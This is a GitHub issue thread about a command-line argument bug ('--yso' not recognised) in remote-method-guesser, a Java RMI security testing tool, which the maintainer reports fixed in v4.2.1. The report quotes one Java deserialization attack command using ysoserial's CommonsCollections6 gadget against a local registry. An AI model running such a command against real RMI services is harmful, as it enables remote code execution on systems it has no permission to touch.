### ISSUE TITLE
unrecognized arguments: '--yso' in rmg-4.2.0-jar-with-dependencies.jar？

### ISSUE THREAD

**Issue by AJDecade** [qtc-de/remote-method-guesser#26]
`java -jar rmg-4.2.0-jar-with-dependencies.jar serial --yso ~/Tools/ysoserial/ysoserial-0.0.5.jar  127.0.0.1 1099  CommonsCollections6 "open -a calculator.app" --component reg`
and get the error
`remote-method-guesser: error: unrecognized arguments: '--yso'`

**Comment by qtc-de** [comment]
Hi there :wave: 

thanks for reporting! The issue should be fixed on develop. New release is coming probably tomorrow.

Best
Tobias

**Comment by qtc-de** [comment]
Resolved in `v4.2.1`
